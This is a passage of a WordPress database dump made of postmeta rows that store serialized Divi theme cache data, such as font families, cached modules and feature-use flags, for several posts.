,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32399,752,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32400,752,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32401,752,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32402,752,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32403,544,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32404,544,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32405,544,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32406,544,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32407,530,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32398,801,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32390,904,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32391,846,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32392,846,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32393,846,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32394,846,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32395,801,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32396,801,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32397,801,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32386,969,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32387,904,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32388,904,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32389,904,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32382,773,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32383,969,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32384,969,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32385,969,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32378,1520,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32379,773,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32380,773,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32381,773,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32374,1302,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32375,1520,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32376,1520,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32377,1520,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32370,1590,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32371,1302,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32372,1302,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32373,1302,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32362,1079,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32363,1391,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32364,1391,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32365,1391,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32366,1391,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32367,1590,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32368,1590,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32369,1590,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32358,994,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32359,1079,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32360,1079,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32361,1079,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32347,832,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32348,832,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32349,832,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32350,832,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9